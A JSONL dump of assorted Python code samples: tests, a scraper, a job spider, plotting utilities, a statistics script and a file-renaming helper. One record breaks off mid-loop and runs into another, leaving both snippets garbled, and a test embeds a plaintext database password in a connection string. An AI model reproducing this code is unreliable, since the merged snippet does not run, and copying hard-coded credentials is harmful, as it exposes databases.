+{"seq_id":"463342961","text":"import pytest\n\nfrom api.searches.serializers import SearchSerializer\nfrom constants import content_types\nfrom db.models.searches import Search\nfrom factories.factory_searches import SearchFactory\nfrom factories.factory_users import UserFactory\nfrom tests.utils import BaseTest\n\n\n@pytest.mark.search_mark\nclass TestSearchSerializer(BaseTest):\n DISABLE_RUNNER = True\n model_class = Search\n expected_keys = {\n 'id',\n 'name',\n 'query',\n }\n\n def setUp(self):\n super().setUp()\n self.user = UserFactory()\n self.obj1 = SearchFactory()\n self.obj2 = SearchFactory(content_type=content_types.BUILD_JOB)\n\n def test_serialize_one(self):\n data = SearchSerializer(self.obj1).data\n\n assert set(data.keys()) == self.expected_keys\n\n for k, v in data.items():\n assert getattr(self.obj1, k) == v\n\n def test_serialize_many(self):\n data = SearchSerializer(Search.objects.all(), many=True).data # noqa\n assert len(data) == 2\n for d in data:\n assert set(d.keys()) == self.expected_keys\n","sub_path":"tests/test_searches/test_serializers.py","file_name":"test_serializers.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"118341170","text":"\"\"\"\r\nWAP that infinitely receives positive integer as input and prints its square.\r\nIf a negative number is entered then raise an exception, display relevant error message and\r\nmake a graceful exit.\r\n\"\"\"\r\ntry:\r\n while True:\r\n num = int(input('Enter a positive number:'))\r\n if num >= 0:\r\n print(num*num)\r\n else:\r\n raise ValueError('Negative number')\r\nexcept ValueError as ve:\r\n print(ve.args)\r\n","sub_path":"Chapter-15-Exception-Handling/Example/1-number-square.py","file_name":"1-number-square.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"75963694","text":"n = 10\n\nprint(\"O(n^2)\")\n\nfor i in range (0,n):\n for j in range (0,n):\n print(i,j)\n\nprint(\"O(n^2)\")\n\nfor i in range(0,n):\n for j in range(0,j):\n print(i,j)\n\nprint(\"O(sqrt(N))\")\n\ni = 1\nwhile i*i', \"\", str(body.find(\"p\")).split(\"
\")[2].split(\"\")[1])\n\t\t\tresearch = re.sub(r'
', \"\", research).strip()\n\t\t\tresearch = research.replace(\";\", \",\")\n\t\t\tret.append([name, \"UCB\", research, homepage])\n\t\texcept:\n\t\t\tret.append([name, \"UCB\", \"\", homepage])\n\n\treturn ret\n\nif __name__ == '__main__':\n\tres = getFacultyDetail()\n\twith io.open(\"data/ucb.csv\", \"w\", encoding=\"utf8\") as f:\n\t\tf.write(\"Professor;University;Research Interest;Homepage\\n\")\n\t\tfor item in res:\n\t\t\tf.write(\"%s\\n\" % \";\".join(item))","sub_path":"ucb.py","file_name":"ucb.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"472681395","text":"##\n# See the file COPYRIGHT for copyright information.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n##\n\n\"\"\"\nTests for :mod:`ranger-ims-server.store.mysql._store`\n\"\"\"\n\nfrom os import environ\nfrom typing import List, Optional, cast\n\nfrom twisted.internet.defer import ensureDeferred\nfrom twisted.logger import Logger\n\nfrom .base import TestDataStore\nfrom .service import MySQLService\nfrom ...test.base import (\n DataStoreTests as SuperDataStoreTests, TestDataStoreABC\n)\nfrom ...test.event import DataStoreEventTests as SuperDataStoreEventTests\nfrom ...test.incident import (\n DataStoreIncidentTests as SuperDataStoreIncidentTests\n)\nfrom ...test.report import (\n DataStoreIncidentReportTests as SuperDataStoreIncidentReportTests\n)\nfrom ...test.street import (\n DataStoreConcentricStreetTests as SuperDataStoreConcentricStreetTests\n)\nfrom ...test.type import (\n DataStoreIncidentTypeTests as SuperDataStoreIncidentTypeTests\n)\n\n\n__all__ = ()\n\n\n\nif environ.get(\"IMS_TEST_MYSQL_HOST\", None) is None:\n from .service import DockerizedMySQLService\n\n def mysqlServiceFactory() -> MySQLService:\n return DockerizedMySQLService()\nelse:\n from .service import ExternalMySQLService\n\n def mysqlServiceFactory() -> MySQLService:\n env = environ.get\n return ExternalMySQLService(\n host=cast(str, env(\"IMS_TEST_MYSQL_HOST\")),\n port=int(env(\"IMS_TEST_MYSQL_PORT\", \"3306\")),\n user=env(\"IMS_TEST_MYSQL_USERNAME\", \"ims\"),\n password=env(\"IMS_TEST_MYSQL_PASSWORD\", \"\"),\n rootPassword=env(\"IMS_TEST_MYSQL_ROOT_PASSWORD\", \"\"),\n )\n\n\nclass DataStoreTests(SuperDataStoreTests):\n \"\"\"\n Parent test class.\n \"\"\"\n\n log = Logger()\n\n skip: Optional[str] = None\n\n mysqlService: MySQLService = mysqlServiceFactory()\n\n\n def setUp(self) -> None:\n async def setUp() -> None:\n self.stores: List[TestDataStore] = []\n\n await self.mysqlService.start()\n\n # setUp can't return a coroutine, so convert it to a Deferred\n return ensureDeferred(setUp())\n\n\n def tearDown(self) -> None:\n async def tearDown() -> None:\n for store in self.stores:\n await store.disconnect()\n\n # setUp can't return a coroutine, so convert it to a Deferred\n return ensureDeferred(tearDown())\n\n\n async def store(self) -> TestDataStoreABC:\n service = self.mysqlService\n\n assert service.host is not None\n assert service.port is not None\n\n name = await service.createDatabase()\n\n store = TestDataStore(\n self,\n hostName=service.host,\n hostPort=service.port,\n database=name,\n username=service.user,\n password=service.password,\n )\n await store.upgradeSchema()\n\n self.stores.append(store)\n\n return cast(TestDataStoreABC, store)\n\n\n\nclass DataStoreEventTests(DataStoreTests, SuperDataStoreEventTests):\n \"\"\"\n Tests for :class:`DataStore` event access.\n \"\"\"\n\n\n\nclass DataStoreIncidentTests(DataStoreTests, SuperDataStoreIncidentTests):\n \"\"\"\n Tests for :class:`DataStore` incident access.\n \"\"\"\n\n\n\nclass DataStoreIncidentReportTests(\n DataStoreTests, SuperDataStoreIncidentReportTests\n):\n \"\"\"\n Tests for :class:`DataStore` incident report access.\n \"\"\"\n\n\n\nclass DataStoreConcentricStreetTests(\n DataStoreTests, SuperDataStoreConcentricStreetTests\n):\n \"\"\"\n Tests for :class:`DataStore` concentric street access.\n \"\"\"\n\n\n\nclass DataStoreIncidentTypeTests(\n DataStoreTests, SuperDataStoreIncidentTypeTests\n):\n \"\"\"\n Tests for :class:`DataStore` incident type access.\n \"\"\"\n","sub_path":"src/ims/store/mysql/test/test_store.py","file_name":"test_store.py","file_ext":"py","file_size_in_byte":4185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"409432733","text":"# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\n탐색 기말고사 코\r\n\"\"\"\r\n\r\n# 1.library 선언\r\nimport numpy as np\r\nimport pandas as pd\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\nfrom statsmodels.formula.api import glm\r\nfrom statsmodels.genmod.families import Binomial\r\n\r\n# 2.데이터 불러오기\r\nchallenger = pd.read_csv(\"C:/Users/ghkdu/Downloads/challenger_data.csv\")\r\n\r\n# 3.요약 테이블 생성\r\ndf = pd.DataFrame()\r\ndf['temp'] = np.unique(challenger.Temperature)\r\ndf['failed'] = 0\r\ndf['ok'] = 0\r\ndf['total'] = 0\r\ndf.index = df.temp.values\r\n\r\n# 4.온도별 이륙 성공여부 체크\r\nfor ii in range(challenger.shape[0]):\r\n curTemp = challenger.Temperature[ii]\r\n curVal = challenger.Incident[ii]\r\n df.loc[curTemp,'total'] += 1\r\n if curVal == 1:\r\n df.loc[curTemp, 'failed'] += 1\r\n else:\r\n df.loc[curTemp, 'ok'] += 1 \r\n\r\n# 5.로지스틱 모델링\r\nmodel = glm(\"failed ~ temp\", data = df, family = Binomial()).fit()\r\nprint(model.summary())\r\n\r\n# 6.로지스틱 모델 플롯\r\nfig = plt.figure()\r\nsns.lmplot(x = \"Temperature\", y = \"Incident\", data = challenger, logistic = True)\r\nplt.title(\"Defects of the Space Shuttle O-Rings vs temperatue\", position = (0.5, 1.0+0.05), fontsize = 15)\r\nplt.xlabel('Outside Temperature[F]')\r\nplt.ylabel('Demage Incident')","sub_path":"기말고사 코드.py","file_name":"기말고사 코드.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"127416349","text":"import os\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\ndef get_container_plots_dir():\n return r'//allen/programs/braintv/workgroups/nc-ophys/visual_behavior/qc_plots/container_plots'\n\ndef get_session_plots_dir():\n return r'//allen/programs/braintv/workgroups/nc-ophys/visual_behavior/qc_plots/session_plots'\n\ndef get_experiment_plots_dir():\n return r'//allen/programs/braintv/workgroups/nc-ophys/visual_behavior/qc_plots/experiment_plots'\n\ndef get_single_cell_plots_dir():\n return r'//allen/programs/braintv/workgroups/nc-ophys/visual_behavior/qc_plots/single_cell_plots'\n\n\ndef save_figure(fig, figsize, save_dir, folder, fig_title, formats=['.png']):\n fig_dir = os.path.join(save_dir, folder)\n if not os.path.exists(fig_dir):\n os.mkdir(fig_dir)\n filename = os.path.join(fig_dir, fig_title)\n mpl.rcParams['pdf.fonttype'] = 42\n fig.set_size_inches(figsize)\n for f in formats:\n fig.savefig(filename + f, transparent=True, orientation='landscape', bbox_inches='tight', dpi=300, facecolor=fig.get_facecolor())\n\n\ndef get_colors_for_session_numbers():\n reds = sns.color_palette('Reds_r', 6)[:5][::2]\n blues = sns.color_palette('Blues_r', 6)[:5][::2]\n return reds + blues\n\n\ndef lighter(color, percent):\n color = np.array(color)\n white = np.array([255, 255, 255])\n vector = white - color\n return color + vector * percent\n\n\ndef get_session_type_color_map():\n colors = np.floor(np.array([list(x) for x in get_colors_for_session_numbers()]) * 255).astype(np.uint8)\n black = np.array([0, 0, 0]).astype(np.uint8)\n\n session_type_color_map = {\n 'OPHYS_0_images_A_habituation': lighter(colors[0, :], 0.8),\n 'OPHYS_1_images_A': colors[0, :],\n 'OPHYS_2_images_A_passive': colors[1, :],\n 'OPHYS_3_images_A': colors[2, :],\n 'OPHYS_4_images_B': colors[3, :],\n 'OPHYS_5_images_B_passive': colors[4, :],\n 'OPHYS_6_images_B': colors[5, :],\n\n 'OPHYS_1_images_B': colors[3, :],\n 'OPHYS_2_images_B_passive': colors[4, :],\n 'OPHYS_3_images_B': colors[5, :],\n 'OPHYS_4_images_A': colors[0, :],\n 'OPHYS_5_images_A_passive': colors[1, :],\n 'OPHYS_6_images_A': colors[2, :],\n\n 'OPHYS_0_images_G_habituation': lighter(colors[3, :], 0.8),\n 'OPHYS_1_images_G': colors[3, :],\n 'OPHYS_2_images_G_passive': colors[4, :],\n 'OPHYS_3_images_G': colors[5, :],\n 'OPHYS_4_images_H': colors[0, :],\n 'OPHYS_5_images_H_passive': colors[1, :],\n 'OPHYS_6_images_H': colors[2, :],\n\n 'OPHYS_7_receptive_field_mapping': lighter(black, 0.5),\n 'None': black,\n None: black,\n np.nan: black,\n 'VisCodingTargetedMovieClips': lighter(black, 0.5),\n 'full_field_test': lighter(black, 0.2)}\n\n return session_type_color_map\n\n\ndef get_location_color(location, project_code):\n colors = sns.color_palette()\n if (project_code == 'VisualBehavior') or (project_code == 'VisualBehaviorTask1B'):\n location_colors = {'Slc17a7_VISp_175': colors[9],\n 'Slc17a7_VISp_375': colors[0],\n 'Vip_VISp_175': colors[4],\n 'Sst_VISp_275': colors[2],\n 'Sst_VISp_290': colors[2]}\n\n elif (project_code == 'VisualBehaviorMultiscope') or (project_code == 'VisualBehaviorMultiscope4areasx2d'):\n location = location.split('_')\n location = location[0] + '_' + location[1]\n location_colors = {'Slc17a7_VISp': sns.color_palette('Blues_r', 5)[0],\n 'Slc17a7_VISl': sns.color_palette('Blues_r', 5)[1],\n 'Slc17a7_VISal': sns.color_palette('Blues_r', 5)[2],\n 'Slc17a7_VISam': sns.color_palette('Blues_r', 5)[3],\n 'Slc17a7_VISpm': sns.color_palette('Blues_r', 5)[4],\n 'Vip_VISp': sns.color_palette('Purples_r', 5)[0],\n 'Vip_VISl': sns.color_palette('Purples_r', 5)[1],\n 'Vip_VISal': sns.color_palette('Purples_r', 5)[2],\n 'Vip_VISam': sns.color_palette('Purples_r', 5)[3],\n 'Vip_VISpm': sns.color_palette('Purples_r', 5)[4],\n 'Sst_VISp': sns.color_palette('Greens_r', 5)[0],\n 'Sst_VISl': sns.color_palette('Greens_r', 5)[1],\n 'Sst_VISal': sns.color_palette('Greens_r', 5)[2],\n 'Sst_VISam': sns.color_palette('Greens_r', 5)[3],\n 'Sst_VISpm': sns.color_palette('Greens_r', 5)[4]}\n\n return location_colors[location]\n\n\n# def lighter(color, percent):\n# color = color * 255\n# color = np.array(color)\n# white = np.array([255, 255, 255])\n# return color + (white * percent)\n#\n\ndef make_color_transparent(rgb_color, background_rgb=[255, 255, 255], alpha=0.5):\n return [alpha * c1 + (1 - alpha) * c2\n for (c1, c2) in zip(rgb_color, background_rgb)]\n\ndef placeAxesOnGrid(fig, dim=[1, 1], xspan=[0, 1], yspan=[0, 1], wspace=None, hspace=None, sharex=False, sharey=False):\n '''\n Takes a figure with a gridspec defined and places an array of sub-axes on a portion of the gridspec\n\n Takes as arguments:\n fig: figure handle - required\n dim: number of rows and columns in the subaxes - defaults to 1x1\n xspan: fraction of figure that the subaxes subtends in the x-direction (0 = left edge, 1 = right edge)\n yspan: fraction of figure that the subaxes subtends in the y-direction (0 = top edge, 1 = bottom edge)\n wspace and hspace: white space between subaxes in vertical and horizontal directions, respectively\n\n returns:\n subaxes handles\n '''\n import matplotlib.gridspec as gridspec\n\n outer_grid = gridspec.GridSpec(100, 100)\n inner_grid = gridspec.GridSpecFromSubplotSpec(dim[0], dim[1],\n subplot_spec=outer_grid[int(100 * yspan[0]):int(100 * yspan[1]),\n # flake8: noqa: E999\n int(100 * xspan[0]):int(100 * xspan[1])], wspace=wspace,\n hspace=hspace) # flake8: noqa: E999\n\n # NOTE: A cleaner way to do this is with list comprehension:\n # inner_ax = [[0 for ii in range(dim[1])] for ii in range(dim[0])]\n inner_ax = dim[0] * [dim[1] * [\n fig]] # filling the list with figure objects prevents an error when it they are later replaced by axis handles\n inner_ax = np.array(inner_ax)\n idx = 0\n for row in range(dim[0]):\n for col in range(dim[1]):\n if row > 0 and sharex == True:\n share_x_with = inner_ax[0][col]\n else:\n share_x_with = None\n\n if col > 0 and sharey == True:\n share_y_with = inner_ax[row][0]\n else:\n share_y_with = None\n\n inner_ax[row][col] = plt.Subplot(fig, inner_grid[idx], sharex=share_x_with, sharey=share_y_with)\n fig.add_subplot(inner_ax[row, col])\n idx += 1\n\n inner_ax = np.array(inner_ax).squeeze().tolist() # remove redundant dimension\n return inner_ax\n\n\n\ndef plot_flashes_on_trace(ax, timestamps, change=None, omitted=False, alpha=0.15, facecolor='gray'):\n \"\"\"\n plot stimulus flash durations on the given axis according to the provided timestamps\n \"\"\"\n stim_duration = 0.2502\n blank_duration = 0.5004\n change_time = 0\n start_time = timestamps[0]\n end_time = timestamps[-1]\n interval = (blank_duration + stim_duration)\n # after time 0\n if omitted:\n array = np.arange((change_time + interval), end_time, interval)\n else:\n array = np.arange(change_time, end_time, interval)\n for i, vals in enumerate(array):\n amin = array[i]\n amax = array[i] + stim_duration\n ax.axvspan(amin, amax, facecolor=facecolor, edgecolor='none', alpha=alpha, linewidth=0, zorder=1)\n if change == True:\n alpha = alpha * 3\n else:\n alpha\n # before time 0\n array = np.arange(change_time, start_time - interval, -interval)\n array = array[1:]\n for i, vals in enumerate(array):\n amin = array[i]\n amax = array[i] + stim_duration\n ax.axvspan(amin, amax, facecolor=facecolor, edgecolor='none', alpha=alpha, linewidth=0, zorder=1)\n return ax\n","sub_path":"visual_behavior/visualization/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"548735647","text":"# External expectations: \n# - A list of all files in *one* of the size directories (e.g., mcsize__16)\n# - Just us an 'ls mcsize__16 > old_list.txt'\n# - Expected to be saved as \"old_list.txt\", otherwise change first with statement below\n\n# Length of genome in orginal data\nold_length = 400 \nnew_length = 100 # Change me for each genome size!\n# Organism sizes for which the script should prep timing data\nsize_list = [8, 16, 32, 64, 128, 256, 512]\n\n# Automatically calcluated variables\nold_threshold = int(old_length) * 0.6\nnew_threshold = int(new_length) * 0.6\nmin_val = old_threshold - new_threshold\nmax_val = old_threshold + (new_length - new_threshold)\n\n# All removes must come before all moves\nrm_list = []\nmv_list = []\n\nwith open('old_list.txt', 'r') as in_fp:\n with open('transfer.sh', 'w') as out_fp:\n # Each line should be in the form X.dat where X in [0, old_length]\n for line in in_fp:\n line = line.strip()\n if line == '':\n continue\n # Extract the number and calculate what it should move to in order to \n # preserve the orginial restraint buffer value\n # e.g., 270 in a 400-bit genome has a restraint buffer value of 10 (270 - 260 = 10)\n # Thus, for a 200-bit genome it would move to 120 + 10 = 130 \n val = int(line.split('.')[0])\n old_diff = val - old_threshold\n new_val = old_diff + new_threshold\n # If it's within the range of the new genome length, add it\n if new_val >= 0 and new_val <= new_length:\n mv_list.append([val, new_val])\n else: # Else, remove it\n rm_list.append(val)\n\n # Create a bash script to move and delete all files as needed\n out_fp.write('#!/bin/bash\\n')\n for size in size_list:\n out_fp.write('cd mcsize__' + str(size) + '\\n')\n out_fp.write('echo \"' + str(size) + '\"\\n')\n for rm_val in rm_list:\n out_fp.write('rm ' + str(rm_val) + '.dat \\n')\n for mv_pair in mv_list:\n out_fp.write('mv ' + str(mv_pair[0]) + '.dat ' + str(mv_pair[1]) + '.dat\\n')\n out_fp.write('cd ..\\n')\n \n\n","sub_path":"experiments/2021_03_04__genome_length_control/helper_scripts/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"116873880","text":"# -*- coding: utf-8 -*-\n\"\"\"This file is a FriendlyHouse spider created on top of the ATSSpider\nscrapy crawl friendlyhouse -a mining_job_id=9999 -a iteration=1 -a url=\"https://friendlyhouse.org/\"\n\nsample url:\n https://friendlyhouse.org/\n\"\"\"\n\nfrom scrapy.http import Request\nfrom scrapy.selector import Selector\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import Prefix, HtmlFormatter, md5_hash\n\n\nclass FriendlyHouse(ATSSpider):\n\n name = 'friendlyhouse'\n logo_url = ''\n\n def parse(self, response):\n sel = Selector(response)\n if not self.logo_url:\n logo = sel.xpath('//div[@class=\"header-logo\"]/a/img/@src').extract()\n self.logo_url = logo if logo else ''\n\n jobs_url = sel.xpath('//a[text()=\"Jobs Listing\"]/@href').extract()\n if jobs_url:\n yield Request(\n jobs_url[0], callback=self.parse_job_callback(),\n headers={\n 'Accept-Encoding': 'gzip, deflate, br',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Connection': 'keep-alive'\n }\n )\n\n def parse_job(self, response):\n sel = Selector(text=response.body, type=\"xml\")\n jobs = sel.xpath('//div[@class=\"job job even\"]')\n for job in jobs:\n job_url = job.xpath('.//tr[th[text()=\"Title\"]]/td/a/@href').extract()\n if job_url:\n loader = BrightcorpItemLoader(selector=job)\n loader.add_value('url', job_url)\n loader.add_value('logo_url', self.logo_url)\n loader.add_xpath('title', './/tr[th[text()=\"Title\"]]/td/a/text()')\n loader.add_value(\n 'referencenumber', response.url, md5_hash, Prefix('%s-' % self.name)\n )\n loader.add_xpath(\n 'baseSalary', './/tr[th[text()=\"Salary\"]]/td/text()'\n )\n loader.add_xpath(\n 'location', './/tr[th[text()=\"Location\"]]/td/text()'\n )\n loader.add_xpath(\n 'description', './/tr[th[text()=\"Job Information\"]]', HtmlFormatter()\n )\n yield loader.load_item()\n","sub_path":"brightcorp/brightcorp/spiders/friendlyhouse.py","file_name":"friendlyhouse.py","file_ext":"py","file_size_in_byte":2363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"449796297","text":"\"\"\"Test dataset for experiment: data schema and data warehouse functionality.\"\"\"\n\nimport pytest\n\n\ndef test_load_universe_of_companies():\n \"\"\"Test reading data from Excel file that contain company directory and quantitave variables in different sheets.\n \n Universe of Companies\nThe information about companies are in the first sheet. This is loaded into data frame and is inserted into table.\n\nThe file SET100_Data.xlsm is the master list of all companies in the universe.\n \"\"\"\n from experiment import os, np, pd, pdr, plt, datetime\n import datetime as dt\n import xlrd\n # First sheet list all companies\n # VO sheet contains VO data\n\n # Row 3 LOC; Row 4 Datatype Row 5 Name\n os.chdir(os.environ['DATA_HOME'] + '/Datastream')\n\n sheets = pd.read_excel('SET100_Data.xlsm', sheet_name=[0,'VO','MV','P','MACD']) \n sheets.keys()\n\n \ndef test_set100_company_dim():\n \"\"\"The company dimension table should contain 160 companies. There are 163 symbols and 3 were duplicates.\"\"\"\n from experiment import os, np, pd\n os.chdir(os.environ['DATA_HOME'] + '/Datastream')\n \n sheets = pd.read_excel('SET100_Data.xlsm', sheet_name=[0])\n \n # List of ticker symbols\n symbols = list(sheets[0]['Symbol In SET100 Constituent'].values)\n \n # Data frame\n df_tickers = sheets[0][['Symbol In SET100 Constituent', 'Company Name', 'Datastream Mnemonic', 'Remark']]\n df_tickers # All 163 stock symbols\n \n # The 160 companies\n df_companies = df_tickers[df_tickers['Datastream Mnemonic'].notnull()]\n df_companies\n \n # The SET100 companies with the sector\n sector_lookup = os.path.join(os.environ['EXPERIMENT_HOME'],\"\"\"1.0 Data Acquisition/stock_ticker.csv\"\"\")\n sector_lookup = pd.read_csv(sector_lookup)\n\n set100_companies = df_companies[['Symbol In SET100 Constituent', 'Company Name', 'Datastream Mnemonic']]\n set100_companies\n\n # Join\n df = set100_companies.merge(sector_lookup, left_on='Symbol In SET100 Constituent', right_on='symbol')\n df['localCode'] = 'TH:'+df['symbol']\n df\n \n # This last dataframe is the 'set100_company_dim' table.\n ### END TEST ###\n \n \ndef test_load_dataset_for_experiment():\n \"\"\"Check datababse connection. Load stock symbols. Get sample data frame for experiment.\"\"\"\n \n from dataset import get_dataset_db\n \n from dataset import shapshot\n the_conn = shapshot.SET100_db_engine()\n dataset_db = get_dataset_db()\n \n \n from sqlalchemy import create_engine\n engine = create_engine('postgresql://datauser:1234@172.18.0.1:5432/stockdb', echo=False)\n assert the_conn == engine\n dataset_db = engine\n \n ","sub_path":"tests/test_data_warehouse.py","file_name":"test_data_warehouse.py","file_ext":"py","file_size_in_byte":2668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"454473365","text":"# bchhun, {2019-09-18}\n\nfrom recOrder.base import VisualizeBase\n\n# import matplotlib\n# matplotlib.use('TkAgg')\n# import matplotlib.pyplot as plt\n# plt.ion()\nimport numpy as np\nimport pyqtgraph as pg\nfrom PyQt5 import QtWidgets\nfrom PyQt5.QtCore import QProcess, pyqtSlot, pyqtSignal\nfrom recOrder.base.utils.QThreader import Processor, ChildProcWithPipes, Processor\n# from multiprocessing import Pipe, Process, Queue\nfrom recOrder.base.utils import QMultiThreader\n\n\nclass RecorderCalibrationGraphController(VisualizeBase):\n\n to_graph = pyqtSignal(object)\n\n def __init__(self):\n super().__init__()\n self.graph = None\n\n @VisualizeBase.receiver(channel=20)\n def new_calibration_plot(self, value):\n self.graph = RecorderCalibrationGraph()\n self.to_graph.connect(self.graph.from_gui)\n\n @VisualizeBase.receiver(channel=4)\n def update(self, value):\n self.graph.show()\n self.to_graph.emit(value)\n\n\nclass RecorderCalibrationGraph(QtWidgets.QMainWindow):\n \"\"\"\n multiple plot axis as by:\n https://github.com/pyqtgraph/pyqtgraph/blob/develop/examples/MultiplePlotAxes.py\n \"\"\"\n\n def __init__(self):\n super(RecorderCalibrationGraph, self).__init__()\n\n # ==============\n # Multiplot, Multi-axis graph init\n # ==============\n\n self.pw = pg.PlotWidget(title=\"LC calibration graph\")\n self.pw.setLabel('bottom', \"frame\")\n self.pw.showGrid(x=True, y=True, alpha=0.5)\n self.setCentralWidget(self.pw)\n\n self.pi_int = self.pw.plotItem\n self.pi_int.setLabel('left', \"Intensity\")\n self.pi_int.showGrid(x=True, y=True, alpha=0.5)\n\n # create a new ViewBox, link the right axis to its coordinate system\n self.vb_lca = pg.ViewBox()\n self.pi_int.showAxis('right')\n self.pi_int.scene().addItem(self.vb_lca)\n self.pi_int.getAxis('right').linkToView(self.vb_lca)\n self.vb_lca.setXLink(self.pi_int)\n self.pi_int.getAxis('right').setLabel('LC value', color='w')\n\n # # create third ViewBox.\n # # this time we need to create a new axis as well.\n # self.p_lcb = pg.ViewBox()\n # # ax3 = pg.AxisItem('right')\n # # self.p_int.layout.addItem(ax3, 2, 3)\n # self.p_int.scene().addItem(self.p_lcb)\n # # ax3.linkToView(self.p_lcb)\n # self.p_int.getAxis('right').linkToView(self.p_lcb)\n # self.p_lcb.setXLink(self.p_int)\n # # ax3.setZValue(-10000)\n # # ax3.setLabel('axis 3', color='#ff0000')\n\n self._update_views()\n self.pi_int.vb.sigResized.connect(self._update_views)\n\n # ==============\n # Data init\n # ==============\n\n # pre-allocate ranges\n self.int_x_sample = [0]\n self.int_y_value = [0]\n\n self.lc_x_sample = [0]\n self.lca_y_sample = [0]\n self.lcb_y_sample = [0]\n\n leg = self.pi_int.addLegend()\n self.pi_int_plot = self.pi_int.plot(x=self.int_x_sample, y=self.int_y_value, pen=pg.mkPen(color='w'), name=\"Intensity\")\n self.lca_data = pg.PlotCurveItem(pen=pg.mkPen(color='b', width=1), name='LCA')\n self.lcb_data = pg.PlotCurveItem(pen=pg.mkPen(color='g', width=1), name='LCB')\n self.vb_lca.addItem(self.lca_data)\n # self.p_lcb.addItem(self.lcb_data)\n self.vb_lca.addItem(self.lcb_data)\n leg.addItem(self.lca_data, name='LCA')\n leg.addItem(self.lcb_data, name='LCB')\n\n self.int_x_current = 0\n self.lc_x_current = 0\n\n # create a legend\n # leg = pg.LegendItem((100, 60), offset=(70,30))\n # leg.setParentItem(self.p_int_plot.graphicsItem())\n # c1 = self.p_int_plot.plot([1, 3, 2, 4], pen='r', symbol='o', symbolPen='r', symbolBrush=0.5, name='red plot')\n # c2 = self.p_int_plot.plot([2, 1, 4, 3], pen='g', fillLevel=0, fillBrush=(255, 255, 255, 30), name='green plot')\n # leg.addItem(c1, 'red plot')\n # leg.addItem(c2, 'green plot')\n\n self.markers = []\n\n self.show()\n\n def _update_views(self):\n # view has resized; update auxiliary views to match\n self.vb_lca.setGeometry(self.pi_int.vb.sceneBoundingRect())\n # self.p_lcb.setGeometry(self.p_int.vb.sceneBoundingRect())\n\n # need to re-update linked axes since this was called\n # incorrectly while views had different shapes.\n # (probably this should be handled in ViewBox.resizeEvent)\n self.vb_lca.linkedViewChanged(self.pi_int.vb, self.vb_lca.XAxis)\n # self.p_lcb.linkedViewChanged(self.p_int.vb, self.p_lcb.XAxis)\n\n @pyqtSlot(object)\n def from_gui(self, value):\n\n if type(value) == tuple:\n self.lc_x_current = self.lc_x_current + 1\n\n lca = value[0]\n lcb = value[1]\n # self.lca_y_sample[self.lc_x_current] = lca\n # self.lcb_y_sample[self.lc_x_current] = lcb\n self.lca_y_sample = self.lca_y_sample + [lca]\n self.lcb_y_sample = self.lcb_y_sample + [lcb]\n\n self.lc_x_sample = self.lc_x_sample + [self.lc_x_current]\n elif type(value) == str:\n self.insert_x_marker(value)\n else:\n self.int_x_current = self.int_x_current + 1\n\n self.int_y_value = self.int_y_value + [np.mean(value)]\n self.int_x_sample = self.int_x_sample + [self.int_x_current]\n # elif type(value) == str:\n # self.insert_x_marker(value)\n\n self.update_plot()\n self._update_views()\n\n def update_plot(self):\n self.pi_int_plot.setData(np.asarray(self.int_x_sample), np.asarray(self.int_y_value))\n self.lca_data.setData(np.asarray(self.lc_x_sample), np.asarray(self.lca_y_sample))\n self.lcb_data.setData(np.asarray(self.lc_x_sample), np.asarray(self.lcb_y_sample))\n\n def insert_x_marker(self, label_):\n\n mark = pg.PlotCurveItem(pen=pg.mkPen(color='y', width=2), name=label_)\n self.vb_lca.addItem(mark)\n\n y_data = [-0.1, 0.1]\n x_data = [self.int_x_current, self.int_x_current]\n mark.setData(x_data, y_data)\n\n self.markers.append(mark)\n\n\n\n#========================================================================================================\n\n#\n# class RecorderCalibrationDisplay(VisualizeBase):\n#\n# def __init__(self):\n# super().__init__()\n# self.x_sample = None\n# self.y_value = None\n# self.process = None\n#\n# @VisualizeBase.receiver(channel=20)\n# def new_calibration_plot(self, param):\n# # self.process = QProcess()\n# # self.setupProcess()\n# self._build_display()\n#\n# def setupProcess(self):\n# # Set the channels\n# self.process.setProcessChannelMode(QProcess.MergedChannels)\n#\n# self._build_display()\n#\n# # Run the process with a given command\n# self.process.start(\"df -h\")\n# # self._build_display()\n#\n# def _build_display(self):\n# # self.__init__()\n#\n# self.data = None\n# self.x_sample = np.array([0])\n# self.y_value = np.array([0])\n#\n# self.fig, self.ax = plt.subplots()\n# self.lines, = self.ax.plot([], [], marker='o', linestyle='-')\n# self.lines.set_dashes([2,2,2,2])\n#\n# self.ax.set(xlabel=\"frame number\", ylabel=\"intensity\",\n# title=\"mean intensity during calibration\")\n#\n# 